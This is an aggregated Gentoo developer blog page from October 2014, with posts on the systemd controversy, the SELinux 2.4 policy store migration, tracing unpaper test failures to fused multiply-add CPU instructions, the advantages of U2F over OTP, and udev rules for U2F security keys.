
. Aaron W. Swenson
. Agostino Sarubbo
. Alec Warner
. Alex Alexander
. Alex Legler
. Alexey Shvetsov
. Alexis Ballier
. Alexys Jacob
. Amadeusz Żołnowski
. Andreas K. Hüttel
. Andreas Proschofsky
. Anthony Basile
. Arun Raghavan
. Bernard Cafarelli
. Bjarke Istrup Pedersen
. Brent Baude
. Brian Harring
. Christian Ruppert
. Chí-Thanh Christopher Nguyễn
. Daniel Gryniewicz
. David Abbott
. Denis Dupeyron
. Detlev Casanova
. Diego E. Pettenò
. Domen Kožar
. Donnie Berkholz
. Doug Goldstein
. Eray Aslan
. Fabio Erculiani
. Gentoo Haskell Herd
. Gentoo Monthly Newsletter
. Gentoo News
. Gilles Dartiguelongue
. Greg KH
. Hanno Böck
. Hans de Graaff
. Ian Whyman
. Ioannis Aslanidis
. Jan Kundrát
. Jason Donenfeld
. Jeffrey Gardner
. Jeremy Olexa
. Joachim Bartosik
. Johannes Huber
. Jonathan Callen
. Jorge Manuel B. S. Vicetto
. Joseph Jezak
. Kenneth Prugh
. Lance Albertson
. Liam McLoughlin
. LinuxCrazy Podcasts
. Luca Barbato
. Luis Francisco Araujo
. Mark Loeser
. Markos Chandras
. Mart Raudsepp
. Matt Turner
. Matthew Marlowe
. Matthew Thode
. Matti Bickel
. Michael Palimaka
. Michal Hrusecky
. Michał Górny
. Mike Doty
. Mike Gilbert
. Mike Pagano
. Nathan Zachary
. Ned Ludd
. Nirbheek Chauhan
. Pacho Ramos
. Patrick Kursawe
. Patrick Lauer
. Patrick McLean
. Pavlos Ratis
. Paweł Hajdan, Jr.
. Petteri Räty
. Piotr Jaroszyński
. Rafael Goncalves Martins
. Raúl Porcel
. Remi Cardona
. Richard Freeman
. Robin Johnson
. Ryan Hill
. Sean Amoss
. Sebastian Pipping
. Steev Klimaszewski
. Stratos Psomadakis
. Sune Kloppenborg Jeppesen
. Sven Vermeulen
. Sven Wegener
. Thomas Kahle
. Tiziano Müller
. Tobias Heinlein
. Tobias Klausmann
. Tom Wijsman
. Tomáš Chvátal
. Vikraman Choudhury
. Zack Medico

Last updated:
October 31, 2014, 16:04 UTC

Views expressed in the content published here do not necessarily represent the views of Gentoo Linux or the Gentoo Foundation.


Powered by:
Planet Venus

Welcome to Gentoo Universe, an aggregation of weblog articles on all topics written by Gentoo developers. For a more refined aggregation of Gentoo-related topics only, you might be interested in Planet Gentoo.

October 30, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

I have been trying my best not to comment on systemd one way or another for a while, mostly because I don't want a trollfest on my blog: moderating one is something I hate, and I'm sure it would be needed. On the other hand, people have started bringing me into the conversation from time to time.

What I would like to point out at this point is that both extreme sides of this debate are, in my opinion, behaving childishly and being totally unprofessional: name-calling of people or software, death threats, insults, satirical websites, labeling 300 people for the actions of a handful of them, and so on.

I don't think I have ever been as happy to have a job that allows me not to care about open source as in the past few weeks, as things keep escalating and escalating. You guys are the worst. And again I refer to both supporters and detractors: devs of systemd, devs of eudev, Debian devs and Gentoo devs, and so on and so forth.

And the reason why I say this is because you both want to bring this to extremes that I think are totally uncalled for. I don't see the world in black and white and I think I said that before. Gray is nuanced and interesting, and needs skills to navigate, so I understand it's easier to just take a stand and never revise your opinion, but the easy way is not what I care about.

Myself, I decided to migrate my non-server systems to systemd a few months ago. It works fine. I've considered migrating my servers, and I decided for the moment to wait. The reason is technical for the most part: I don't think I trust the stability promises for the moment and I don't reboot servers that often anyway.

There are good things to the systemd design. And I'm sure that very few people will really miss sysvinit as is. Most people, especially in Gentoo, have not been using sysvinit properly, but rather through OpenRC, which shares more spirit with systemd than sysv, either by coincidence or because they are just the right approach to things (declarativeness to begin with).

At the same time, I don't like Lennart's approach on this to begin with, and I don't think it's uncalled for to criticize the product based on the person in this case, as the two are tightly coupled. I don't like moderating people away from a discussion, because it just ends up making the discussion even more confrontational on the next forum you stumble across them — this is why I never blacklisted Ciaran and friends from my blog, even after a group of them started pasting my face on pictures of Nazi soldiers from WW2. Yes, I agree that Gentoo has a good chunk of toxic supporters; I wish we had gotten rid of them a long while ago.

At the same time, if somebody were to try to categorize me the same way as the people who decided to fork udev without even thinking of what they were doing, I would want to point out that I was reproaching them from day one for their absolutely insane (and inane) starting announcement and first few commits. And I have never used it, since for the moment they seem to have made good on the promise of not making it impossible to run udev without systemd.

I don't agree with the complete direction right now, and especially with the one-size-fits-all approach (on either side!) that tries to reduce the "software biodiversity". At the same time there are a few designs that would be difficult for me to attack given that they were ideas of mine as well, at some point. Such as the runtime binary approach to hardware IDs (that Greg disagreed with at the time and that was then implemented by systemd/udev), or the usage of tmpfs ACLs to allow users at the console to access devices — which was essentially my original proposal to get rid of pam_console (that played with owners instead, making it messy when having more than one user at console), when consolekit and its groups-fiddling was introduced (groups can be used for setgid, not a good idea).

So why am I posting this? Mostly to tell everybody out there that if you plan on using me to bring either side's point home, you can forget about it. I'll probably get pissed off enough to try to prove the exact opposite, and then back again.

Neither of you is perfectly right. You both make mistakes. And you are both unprofessional. Try to grow up.

Edit: I mistyped eudev in the original article and it read euscan. Sorry Corentin, was thinking one thing and typing another.

Sven Vermeulen a.k.a. swift (homepage, bugs)

In a few moments, SELinux users who have the ~arch KEYWORDS set (either globally or for the SELinux utilities in particular) will notice that the SELinux userspace upgrades to version 2.4 (release candidate 5 for now). This upgrade comes with a manual step that needs to be performed afterwards. The information is shown as a post-installation message of the policycoreutils package, and basically says that you need to execute:

~# /usr/libexec/selinux/semanage_migrate_store

The reason is that the SELinux utilities expect the SELinux policy module store (and the semanage related files) to be in /var/lib/selinux and no longer in /etc/selinux. Note that this does not mean that the SELinux policy itself is moved outside of that location, nor is the basic configuration file (/etc/selinux/config). It is what tools such as semanage manage that is moved outside that location.

I tried to automate the migration as part of the packages themselves, but this would require the portage_t domain to be able to move, rebuild and load policies, which it can’t (and to be honest, shouldn’t). Instead of augmenting the policy or making updates to the migration script as delivered by the upstream project, we currently decided to have the migration done manually. It is a one-time migration anyway.

If for some reason end users forget to do the migration, that does not mean that the system breaks or becomes unusable. SELinux still works, SELinux-aware applications still work; the only things that will fail are updates to the SELinux configuration through tools like semanage or setsebool – the latter only when you want to persist boolean changes.

~# semanage fcontext -l
ValueError: SELinux policy is not managed or store cannot be accessed.
~# setsebool -P allow_ptrace on
Cannot set persistent booleans without managed policy.

If you get those errors or warnings, all that is left to do is run the migration. Note in the following that there is a warning about 'else' blocks that are no longer supported: that's okay; as far as I know it does not have any impact (and it was mentioned on the upstream mailing list as well as not something to worry about).

~# /usr/libexec/selinux/semanage_migrate_store
Migrating from /etc/selinux/mcs/modules/active to /var/lib/selinux/mcs/active
Attempting to rebuild policy from /var/lib/selinux
sysnetwork: Warning: 'else' blocks in optional statements are unsupported in CIL. Dropping from output.

You can also add -c so that the old policy module store is cleaned up, and you can safely rerun the command multiple times:

~# /usr/libexec/selinux/semanage_migrate_store -c
warning: Policy type mcs has already been migrated, but modules still exist in the old store. Skipping store.
Attempting to rebuild policy from /var/lib/selinux

You can manually clean up the old policy module store like so:

~# rm -rf /etc/selinux/mcs/modules

So… don’t worry – the change is small and does not break stuff. And for those wondering about CIL I’ll talk about it in one of my next posts.

October 29, 2014
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
Happy 17th! (October 29, 2014, 15:10 UTC)

Just wanted to wish you a Happy 17th Birthday, Noah. I hope that it is a great day for you, and that the upcoming year is even better than this past one! My wish for you this year is that you are able to take time to enjoy the truly important things in life: family, friends, your health, and the events that don’t require anything more than your attention. Take the time—MAKE the time—to stop and appreciate the world around you.


October 27, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

Yesterday I released a new version of unpaper which is now in Portage, even though its dependencies are not exactly straightforward after making it use libav. But when I packaged it, I realized that the tests were failing — even though I had made sure to run the tests all the time while making changes, so as not to break the algorithms which (as you may remember) I did not design or write — I don't really have enough math to figure out what's going on with them. I was able to simplify a few things, but I needed Luca's help for the most part.

It turned out that the problem only happened when building with -O2 -march=native, so I decided to restrict the tests and look into it again in the morning. Indeed, on Excelsior, using -march=native would cause the failure, but on my laptop (where I had been running the tests after every single commit) it would not. Why? Furthermore, Luca was also reporting test failures on his laptop with OS X and clang, but I had not tested there to begin with.

A quick inspection of one of the failing tests' outputs with vbindiff showed that the diffs would be quite minimal, one bit off at some non-obvious interval. It smelled like a very minimal change. After complaining on G+, Måns pushed me to the right direction: some instruction set that differs between the two.

My laptop uses the core-avx-i arch, while the server uses bdver1. They have different levels of SSE4 support – AMD having their own SSE4a implementation – and different extensions. I should probably have paid more attention here and noticed that Bulldozer has FMA4 instructions, but I did not; it'll prove important later.

I decided to start disabling extensions in alphabetical order, mostly expecting the problem to be in AMD's implementation of some instructions pending some microcode update. When I disabled AVX, the problem went away — AVX has essentially a new encoding of instructions, so enabling AVX causes all the instructions otherwise present in SSE to be re-encoded, and is a dependency for FMA4 instructions to be usable.

The problem was reducing the code enough to be able to figure out whether the problem was a bug in the code, in the compiler, in the CPU, or just in the assumptions. Given that unpaper is over five thousand lines of code and comments, I needed to reduce it a lot. Luckily, there are ways around it.

The first step is to look in which part of the code the problem appears. Luckily unpaper is designed with a bunch of functions that run one after the other. I started disabling filters and masks and I was able to limit the problem to the deskewing code — which is when most of the problems happened before.

But even the deskewing code is a lot — and it depends on at least some part of the general processing to be run, including loading the file and converting it to an AVFrame structure. I decided to try to reduce the code to a standalone unit calling into the full deskewing code. But when I copied over and looked at how much code was involved, between the skew detection and the actual rotation, it was still a lot. I decided to start looking with gdb to figure out which of the two halves was misbehaving.

The interface between the two halves is well-defined: the first returns the detected skew, and the second takes the rotation to apply (the negative of what the first returned) and the image to apply it to. It's easy. A quick look through gdb at the call to rotate() in both a working and a failing setup told me that the returned value from the first half matched perfectly; this is great because it meant that the surface to inspect was heavily reduced.

Since I did not want to have to test all the code to load the file from disk and decode it into a RAW representation, I looked into the gdb manual and found the dump commands that allows you to dump part of the process's memory into a file. I dumped the AVFrame::data content, and decided to use that as an input. At first I decided to just compile it into the binary (you only need to use xxd -i to generate C code that declares the whole binary file as a byte array) but it turns out that GCC is not designed to compile efficiently a 17MB binary blob passed in as a byte array. I then opted in for just opening the raw binary file and fread() it into the AVFrame object.

My original plan involved using creduce to find the minimal set of code needed to trigger the problem, but it was tricky, especially when trying to match a complete file output to the md5. I decided to proceed with the reduction manually, starting from all the conditionals for pixel formats that were not exercised… and then I realized that I could again split the code into two operations. Indeed, while the main interface is only rotate(), there were two logical parts of the code in use: one translating the coordinates before and after the rotation, and the interpolation code that would read the old pixels and write the new ones. This latter part also depended on all the code to set a pixel in place starting from its components.

By writing as output the calls to the interpolation function, I was able to restrict the issue to the coordinate translation code, rather than the interpolation one, which made it much better: the reduced test case went down to a handful of lines:

void rotate(const float radians, AVFrame *source, AVFrame *target) {
    const int w = source->width;
    const int h = source->height;

    // create 2D rotation matrix
    const float sinval = sinf(radians);
    const float cosval = cosf(radians);
    const float midX = w / 2.0f;
    const float midY = h / 2.0f;

    for (int y = 0; y < h; y++) {
        for (int x = 0; x < w; x++) {
            const float srcX = midX + (x - midX) * cosval + (y - midY) * sinval;
            const float srcY = midY + (y - midY) * cosval - (x - midX) * sinval;
            externalCall(srcX, srcY);
        }
    }
}

Here externalCall is a simple function to extrapolate the values; the only thing it does is print them on the standard error stream. In this version there are still references to the input and output AVFrame objects, but as you can notice there is no usage of them, which means that the test case is now self-contained and does not require any input or output file.

Much better, but still too much code to go through. The inner loop over x was simple to remove: just hardwire it to zero and the compiler was still able to reproduce the problem. But if I hardwired y to zero, the compiler would trigger constant propagation and just pre-calculate the right value, whether or not AVX was in use.

At this point I was able to execute creduce; I only needed to check the first line of the output against the "incorrect" version, and no input was requested (the radians value was fixed). Unfortunately it turns out that using creduce with loops is not a great idea, because it is entirely possible for it to reduce away the y++ statement or the y < h exit comparison, and then you're in trouble. Indeed, it got stuck in infinite loops on my code multiple times.

But it did help a little bit to simplify the calculation. And with again a lot of help by Måns on making sure that the sinf()/cosf() functions would not return different values – they don't, also they are actually collapsed by the compiler to a single call to sincosf(), so you don't have to write ugly code to leverage it! – I brought down the code to

extern void externCall(float);
extern float sinrotation();
extern float cosrotation();

static const float midX = 850.5f;
static const float midY = 1753.5f;

void main() {
    const float srcX = midX * cosrotation() - midY * sinrotation();
    externCall(srcX);
}

No external libraries, not even libm. The external functions are in a separate source file, and beside providing fixed values for sine and cosine, the externCall() function only calls printf() with the provided value. Oh if you're curious, the radians parameter became 0.6f, because 0, 1 and 0.5 would not trigger the behaviour, but 0.6 which is the truncated version of the actual parameter coming from the test file, would.

Checking the generated assembly code for the function then pointed out the problem, at least to Måns, who actually knows Intel assembly. Here follows a diff of the code above, built with -march=bdver1 and with -march=bdver1 -mno-fma4 — because it turns out the instruction causing the problem is not an AVX one but an FMA4 one; more on that after the diff.

        movq    -8(%rbp), %rax
        xorq    %fs:40, %rax
        jne     .L6
-       vmovss  -20(%rbp), %xmm2
-       vmulss  .LC1(%rip), %xmm0, %xmm0
-       vmulss  .LC0(%rip), %xmm2, %xmm1
+       vmulss  .LC1(%rip), %xmm0, %xmm0
+       vmovss  -20(%rbp), %xmm1
+       vfmsubss        %xmm0, .LC0(%rip), %xmm1, %xmm0
        .cfi_def_cfa 7, 8
-       vsubss  %xmm0, %xmm1, %xmm0
        jmp     externCall@PLT

It's interesting that it changes the order of the instructions as well as the constants — for this diff I have manually swapped .LC0 and .LC1 on one side, as they would otherwise just end up with different names due to instruction ordering.

As you can see, the FMA4 version has one instruction less: vfmsubss replaces both one of the vmulss instructions and the vsubss instruction. vfmsubss is an FMA4 instruction that performs a Fused Multiply and Subtract operation — and midX * cosrotation() - midY * sinrotation() indeed has a multiply and a subtract!

Originally, since I was disabling the whole AVX instruction set, all the vmulss instructions would end up replaced by mulss which is the SSE version of the same instruction. But when I realized that the missing correspondence was vfmsubss and I googled for it, it was obvious that FMA4 was the culprit, not the whole AVX.

Great, but how does that explain the failure on Luca's laptop? He's not so crazy as to use an AMD laptop — nobody would be! Well, it turns out that Intel also has its own Fused Multiply-Add instruction set, just with three operands rather than four, starting from Haswell CPUs, which include… Luca's laptop. A quick check on my NUC, which also has a Haswell CPU, confirms that the problem exists for the core-avx2 architecture as well, even though the code diff is slightly less obvious:

        movq    -24(%rbp), %rax
        xorq    %fs:40, %rax
        jne     .L6
-       vmulss  .LC1(%rip), %xmm0, %xmm0
-       vmovd   %ebx, %xmm2
-       vmulss  .LC0(%rip), %xmm2, %xmm1
+       vmulss  .LC1(%rip), %xmm0, %xmm0
+       vmovd   %ebx, %xmm1
+       vfmsub132ss     .LC0(%rip), %xmm0, %xmm1
        addq    $24, %rsp
+       vmovaps %xmm1, %xmm0
        popq    %rbx
-       vsubss  %xmm0, %xmm1, %xmm0
        popq    %rbp
        .cfi_def_cfa 7, 8

Once again I swapped .LC0 and .LC1 afterwards for consistency.

The main difference here is that the instruction for fused multiply-subtract is vfmsub132ss, and a vmovaps is involved as well. If I read the documentation correctly, this is because the result is stored in %xmm1 but needs to be moved to %xmm0 to be passed to the external function. I'm not enough of an expert to tell whether gcc is doing extra work here.

So why is this instruction causing problems? Well, Måns knew and pointed out that the result is now more precise, thus I should not work around it. Wikipedia, as linked before, also points out why this happens:

A fused multiply–add is a floating-point multiply–add operation performed in one step, with a single rounding. That is, where an unfused multiply–add would compute the product b×c, round it to N significant bits, add the result to a, and round back to N significant bits, a fused multiply–add would compute the entire sum a+b×c to its full precision before rounding the final result down to N significant bits.
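That single rounding is easy to demonstrate. Here is a small illustration of my own (not code from unpaper), in Python, emulating single-precision arithmetic by round-tripping values through a 32-bit float:

```python
import struct

def f32(x):
    """Round a Python float (a double) to the nearest IEEE-754 single."""
    return struct.unpack('f', struct.pack('f', x))[0]

a = f32(1.0 / 3.0)   # a single-precision operand
p = f32(a * a)       # the product, rounded to single precision

# Unfused multiply-subtract: round after the multiply, then after the
# subtract, like the separate vmulss/vsubss pair.
unfused = f32(f32(a * a) - p)

# Fused multiply-subtract: the product keeps its full precision and only
# the final result is rounded, like vfmsubss.
fused = f32(a * a - p)

print(unfused, fused)
```

The unfused version rounds the product to 24 bits and then subtracts that same rounded value, giving exactly zero; the fused version preserves the rounding residue of the product. That residue is precisely the kind of low-bit difference vbindiff showed between the two outputs.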

Unfortunately this does mean that we can't have bit-exactness of images for CPUs that implement fused operations. Which means my current test harness is not good, as it compares the MD5 of the output with the golden output from the original test. My probable next move is to use cmp to count how many bytes differ from the "golden" output (the version built without these optimisations), and if the number is low, say less than 1‰, accept it as valid. It's probably not ideal and could lead to further variation in output, but it might be a good start.
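As a sketch of that idea, a byte-level tolerance check could look like this in Python (the function name and threshold are my own illustration, not the harness unpaper actually ships):

```python
def close_enough(golden: bytes, candidate: bytes, max_ratio: float = 0.001) -> bool:
    """Accept candidate if at most max_ratio (default 1 per mille) of its
    bytes differ from the golden output; sizes must match exactly."""
    if len(golden) != len(candidate):
        return False
    differing = sum(1 for g, c in zip(golden, candidate) if g != c)
    return differing <= max_ratio * len(golden)

# One differing byte out of 2000 is within the 1 per mille budget.
print(close_enough(b"x" * 2000, b"x" * 1999 + b"y"))
```

In the real harness the two buffers would come from reading the golden file and the freshly produced output in binary mode.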

Optimally, as I said a long time ago, I would like to use a tool like pdiff to tell whether there are actual changes in the pixels, and to identify things like a 1-pixel translation in any direction, which would be harmless… but until I can figure something out, it'll be an imperfect testsuite anyway.

A huge thanks to Måns for the immense help, without him I wouldn't have figured it out so quickly.

Why is U2F better than OTP? (October 27, 2014, 11:22 UTC)

It is not really obvious to many people how U2F is better than OTP for two-factor authentication; in particular I've seen it compared with full-blown smartcard-based authentication, and I think that's a bad comparison to make.

Indeed, the Security Key is not protected by a PIN, and the NEO-n is designed to be semi-permanently attached to a laptop or desktop. At first this seems pretty insecure, no better than storing the authorization straight into the computer, but that's not the case.

But let's start from the target users: the Security Key is not designed to replace the pure-paranoia security devices such as 16Kibit-per-key smartcards, but rather the on-phone or by-SMS OTP two-factor authenticators: those that use Google Authenticator or other open-source implementations, or that are configured to receive codes by SMS.

Why replace those? At first sight they all sound like perfectly good ideas, so what's to be gained by replacing them? Well, there is plenty, the first thing being the user-friendliness of this concept. I know it's an overused metaphor, but I do actually judge features on whether my mother would be able to use them or not — she's not a stupid person and can use a computer mostly just fine, but adding any more procedures is something that would frustrate her quite a bit.

So either having to open an application and figure out which of many codes to use at a given time, or having to receive an SMS and then re-type the code, would not be something she'd be happy with. Even more so because she does not have a smartphone, and she does not keep her phone on all the time, as she does not want to be bothered by people. This makes both the Authenticator and SMS routes a bad choice — and let's not try to suggest that there are ways not to be available on the phone without turning it off; it would be one more thing to learn that she does not care about.

Similar to the "phone-is-not-connected" problem, but for me rather than my mother, is the "wrong-country-for-the-phone" problem: I travel a lot, this year aiming for over a hundred days on the road, and there are very few countries in which I keep my Irish phone number available – namely Italy and the UK, where Three is available and I don't pay roaming, when the roaming system works… last time I was in London the roaming system was not working – in the others, including the US which is obviously my main destination, I have a local SIM card so I can use data and calls. This means that if my 2FA setup sends an SMS to the Irish number, I won't receive it easily.

Admittedly, an alternative way to do this would be for me to buy a cheap featurephone, so that instead of losing access to that SIM, I can at least receive calls/SMS.

This is not only theoretical. I have been at two conferences already (USENIX LISA 13, and Percona MySQL Conference 2014) where I realized I had cut myself out of my LinkedIn account: the connection came from a completely different country than usual (the US rather than Ireland) and it required re-authentication… but it was configured to send the SMS to my Irish phone, which I had no access to. Given that conferences are where you meet people you may want to look up on LinkedIn, it's quite inconvenient — luckily the authentication on the phone persists.

The authenticator apps are definitely more reliable than that when you travel, but they also come with their own set of problems. Besides the incomplete coverage of services (LinkedIn, noted above, for instance does not support authenticator apps), which is going to be a problem for U2F as well, at least at the beginning, neither Google's nor Fedora's authenticator app allows you to take a backup of the private keys used for OTP generation, which means that when you change your phone you'll have to replace the OTP generation parameters one by one. For some services such as Gandi, there is also no way to have a backup code, so if you happen to lose, break, or reset your phone without first disabling the second-factor auth, you're in trouble.

Then there are a few more technical problems. HOTP, like other counter-based OTP implementations, relies on shared state between the generator and the validator: a counter of how many times a code was generated. The client increases it with every generation; the server should only increase it after a successful authentication. Even discounting bugs on the server side, a malicious actor whose intent is to lock you out can just generate enough codes on your device that the server will not look far enough ahead to find a valid code.

TOTP instead relies on synchronization of time between server and generator, which is a much safer assumption. Unfortunately, this also means you have a limited amount of time to type your code, which is tricky for the many people who are not used to typing quickly — Luca, for instance.
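The shared state involved is easy to see in code. This is a minimal sketch of the RFC 4226 (HOTP) construction and its RFC 6238 (TOTP) variant, using only the Python standard library; six digits and a 30-second step are just the common defaults:

```python
import hashlib
import hmac
import struct
import time

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    # HMAC-SHA1 over the 8-byte big-endian counter, then dynamic truncation.
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret: bytes, step: int = 30, digits: int = 6) -> str:
    # Same construction, but the counter is derived from the clock, so the
    # only state to keep in sync is the time itself.
    return hotp(secret, int(time.time()) // step, digits)

# RFC 4226 test vector: secret "12345678901234567890", counter 0.
print(hotp(b"12345678901234567890", 0))  # → 755224
```

The HOTP counter is exactly the state a malicious actor can race ahead of; with TOTP there is no counter to desynchronize, only the typing window.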

There is one more problem with both implementations: they rely on the user to choose the right entry in the list and copy the right OTP value. This means you can still phish a user into typing in an OTP and use it to authenticate against the service: 2FA is a protection against third parties gaining access to your account when your password is posted online, rather than a protection against phishing.

U2F helps here, as it lets the browser handshake with the service before providing the current token to authenticate the access. Sure, there might still be gaps in its implementation, and since I have not studied it in depth I'm not going to vouch for it being untouchable, but I trust the people who worked on it and I feel safer with it than I would with a simple OTP.
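The origin binding can be illustrated with a toy model. To be clear, this is not the actual U2F protocol: real U2F uses per-origin ECDSA key pairs and the browser supplies the origin, while here a shared HMAC key merely stands in for the signature. It only shows why a token that signs the origin together with the challenge is useless to a phishing page:

```python
import hashlib
import hmac
import os

DEVICE_KEY = os.urandom(32)  # stand-in for the key material on the token

def token_sign(challenge: bytes, origin: str) -> bytes:
    # The token signs the origin the browser reports alongside the challenge.
    return hmac.new(DEVICE_KEY, origin.encode() + b"|" + challenge,
                    hashlib.sha256).digest()

def server_verify(challenge: bytes, signature: bytes) -> bool:
    # The legitimate server only accepts signatures bound to its own origin.
    expected = hmac.new(DEVICE_KEY, b"https://example.com|" + challenge,
                        hashlib.sha256).digest()
    return hmac.compare_digest(expected, signature)

challenge = os.urandom(16)
# A signature produced for a look-alike phishing origin is rejected.
print(server_verify(challenge, token_sign(challenge, "https://example.com")))
print(server_verify(challenge, token_sign(challenge, "https://examp1e.com")))
```

An OTP, by contrast, is just a short string the user can be tricked into typing anywhere; nothing in it is bound to the site that will consume it.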

October 26, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

I have already posted a howto on how to set up the YubiKey NEO and YubiKey NEO-n for U2F, and I promised I would write a bit more on the adventure to get the software packaged in Gentoo.

You have to realize first that my relationship with Yubico has not always been straightforward. At least once I decided against working on the Yubico set of libraries in Gentoo because I could not get hold of a device the way I wanted to. But luckily now I was able to place an order with them (for some two thousand euro) and I have my devices.

But Yubico's code is usually quite well written, and designed to be packaged much more easily than most other device-specific middleware, so I cannot complain too much. Indeed, they split and release the different libraries separately, each with its own goals, so that you don't have to wait for enough changes to pile up before they make a new release. They also actively maintain their code on GitHub, and then push proper make dist releases to their website. They are in many ways a packager's dream company.

But let's get back to the devices themselves. The NEO and NEO-n come with three different interfaces: OTP (old-style YubiKey, just much longer keys), CCID (smartcard interface) and U2F. By default the devices are configured as OTP only, which I find a bit strange, to be honest. It is also the case that at the moment you cannot enable both U2F and OTP modes, I assume because there is a conflict in how the "touch" interaction behaves; indeed there is a touch-based interaction in CCID mode that gets entirely disabled once you enable either U2F or OTP, but the two can't share it.

What is not obvious from the website is that to enable U2F (or CCID) modes, you need to use yubikey-neo-manager, an open-source app that can reconfigure the basics of the Yubico device. So I had to package the app for Gentoo of course, together with its dependencies, which turned out to be two libraries (okay actually three, but the third one sys-auth/ykpers was already packaged in Gentoo — and actually originally committed by me with Brant proxy-maintaining it, the world is small, sometimes). It was not too bad but there were a few things that might be worth noting down.

First of all, I had to deal with dev-libs/hidapi, which allows programmatic access to raw HID USB devices: the ebuild failed for me, both because it was not depending on udev, and because it was unable to find the libusb headers — which turned out to be caused by bashisms in the file, and became obvious as I moved to dash. I have now fixed the ebuild and sent a pull request upstream.

This was the only really hard part at first, since the rest of the ebuilds, for app-crypt/libykneomgr and app-crypt/yubikey-neo-manager, were mostly straightforward — only I had to figure out how to install a Python package, as I had never done so before. It's actually fun how distutils will error out with a violation of install paths if easy_install tries to bring in a non-installed package such as nose, way before the Portage sandbox triggers.

The problems started when trying to use the programs, doubly so because I don't keep a copy of the Gentoo tree on the laptop, so I wrote the ebuilds on the headless server and then tried to run them on the actual hardware. First of all, you need to have access to the devices to be able to set them up; the libu2f-host package will install udev rules to allow the plugdev group access to the hidraw devices — but it also needed a pull request to fix them. I also added an alternative version of the rules for systemd users that does not rely on the group but rather uses the ACL support (I was surprised; I essentially suggested the same approach to replace pam_console years ago!)

Unfortunately that only works once the device is already set in U2F mode, which does not work when you're setting up the NEO for the first time, so I originally set it up using kdesu. I have since decided that the better way is to use the udev rules I posted in my howto post.

After this, I switched off OTP, and enabled U2F and CCID interfaces on the device — and I couldn't make it stick, the manager would keep telling me that the CCID interface was disabled, even though the USB descriptor properly called it "Yubikey NEO U2F+CCID". It took me a while to figure out that the problem was in the app-crypt/ccid driver, and indeed the change log for the latest version points out support for specifically the U2F+CCID device.

I have updated the ebuilds afterwards, not only to depend on the right version of the CCID driver – the README for libykneomgr does tell you to install pcsc-lite but not about the CCID driver you need – but also to check for the HIDRAW kernel driver, as otherwise you won't be able to either configure or use the U2F device for non-Google domains.

Now there is one more part of the story that needs to be told, but in a different post: getting GnuPG to work with the OpenPGP applet on the NEO-n. It was not as straightforward as it could have been, and it did lead to disappointment. It'll be a good post for next week.

October 25, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

When the Google Online Security blog announced earlier this week the general availability of Security Key, everybody at the office was thrilled, as we've been waiting for the day for a while. I've been using this for a while already, and my hope is for it to be easy enough for my mother and my sister, as well as my friends, to start using it.

While the promise is for a hassle-free second factor authenticator, it turns out it might not be as simple as originally intended, at least on Linux, at least right now.

Let's start with the hardware, as there are four different hardware options you can choose from:

  • Yubico FIDO U2F which is a simple option only supporting the U2F protocol, no configuration needed;
  • Plug-up FIDO U2F which is a cheaper alternative with the same features — I have not been able to check whether it is as sturdy as the Yubico one, so I can't vouch for it;
  • Yubikey NEO which provides multiple interfaces, including OTP (not usable together with U2F), OpenPGP and NFC;
  • Yubikey NEO-n the same as above, without NFC, and in a very tiny form factor designed to be left semi-permanently in a computer or laptop.

I got the NEO, but mostly to be used with LastPass – the NFC support allows you to have 2FA on the phone without having to type it back from a computer – and a NEO-n to leave installed on one of my computers. I already had a NEO from work to use as well. The NEO requires configuration, so I'll get back to it in a moment.

The U2F devices are accessible via hidraw, a driverless access protocol for USB devices, originally intended for devices such as keyboards and mice but also leveraged by UPSes. What happens, though, is that you need access to the device, which the Linux kernel by default makes accessible only to root, for good reasons.

To make the device accessible to you, the user actually at the keyboard of the computer, you have to use udev rules, and those are, as always, not straightforward. My personal hacky choice is to make all the Yubico devices accessible — the main reason being that I don't know all of the compatible USB Product IDs, as some of them are not really available to buy but come for instance from developer-mode devices that I may or may not end up using.

If you're using systemd with device ACLs (in Gentoo, that would be sys-apps/systemd with acl USE flag enabled), you can do it with a file as follows:

# /etc/udev/rules.d/90-u2f-securitykey.rules
ATTRS{idVendor}=="1050", TAG+="uaccess"
ATTRS{idVendor}=="2581", ATTRS{idProduct}=="f1d0", TAG+="uaccess"

If you're not using systemd or ACLs, you can use the plugdev group and instead do it this way:

# /etc/udev/rules.d/90-u2f-securitykey.rules
ATTRS{idVendor}=="1050", GROUP="plugdev", MODE="0660"
ATTRS{idVendor}=="2581", ATTRS{idProduct}=="f1d0", GROUP="plugdev", MODE="0660"

These rules originally did not include support for the Plug-up, because I had no idea what their VID/PID pairs were; I asked Janne, who got one, so I could amend this later. Edit: added the rules for the Plug-up device. Cute, their use of f1d0 as device ID.

Also note that there are probably less hacky solutions to get the ownership of the devices right, but I'll leave it to the systemd devs to figure out how to include it in the default ruleset.

These rules will not only allow your user to access /dev/hidraw0 but also the /dev/bus/usb/* devices. This is intentional: Chrome (and Chromium, its open-source counterpart, which works as well) uses the U2F devices in two different modes: one is through a built-in extension that works with Google assets and accesses the low-level device as /dev/bus/usb/*; the other is through a Chrome extension which uses /dev/hidraw* and is meant to be used by all websites. The latter is the actually-standardized specification and how you're supposed to use it right now. I don't know if the former workflow is going to be deprecated at some point, but I wouldn't be surprised.

For those like me who bought the NEO devices, you'll have to enable the U2F mode — while Yubico provides the linked step-by-step guide, it was not entirely correct for me on Gentoo, but it should be less complicated now: I packaged the app-crypt/yubikey-neo-manager app, which already brings in all the necessary software, including the latest version of app-crypt/ccid required to use the CCID interface on U2F-enabled NEOs. And if you already created the udev rules file as I noted above, it'll work without root privileges. Just remember that if you are interested in the OpenPGP support you'll need the pcscd service (it should auto-start with both OpenRC and systemd anyway).

I'll recount separately the issues with packaging the software. In the meantime make sure you keep your accounts safe, and let's all hope that more sites will start protecting your accounts with U2F — I'll also write a separate opinion piece on why U2F is important and why it is better than OTP; this is just meant as documentation on how to set up the U2F devices on your Linux systems.

Gentoo Monthly Newsletter: September 2014 (October 25, 2014, 09:10 UTC)

Gentoo News

Council News

